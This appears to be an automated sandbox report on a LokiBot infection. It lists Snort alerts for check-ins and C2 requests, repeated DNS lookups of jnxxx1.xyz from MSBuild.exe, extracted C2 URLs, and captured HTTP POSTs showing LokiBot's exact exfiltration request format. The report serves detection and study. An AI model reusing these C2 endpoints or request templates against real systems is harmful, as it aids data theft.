                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49877 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49877 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49877 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49878 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49878 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49878 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49878 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49879 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49879 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49879 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49879 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49880 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49880 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49880 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49880 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49881 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49881 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49881 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49881 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49882 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49882 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49882 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49882 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49883 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49883 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49883 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49883 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49885 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49885 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49885 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49885 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49886 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49886 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49886 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49886 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49887 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49887 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49887 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49887 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49888 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49888 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49888 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49888 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49889 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49889 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49889 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49889 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49890 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49890 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49890 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49890 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49891 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49891 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49891 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49891 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49892 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49892 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49892 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49892 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49893 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49893 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49893 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49893 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49894 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49894 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49894 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49894 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49895 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49895 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49895 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49895 -> 104.21.60.171:80
                Performs DNS queries to domains with low reputationShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDNS query: jnxxx1.xyz
                Source: DNS query: jnxxx1.xyz
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: https://jnxxx1.xyz/JRM/w2/fre.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /JRM/w2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: jnxxx1.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 45365306Content-Length: 163Connection: close
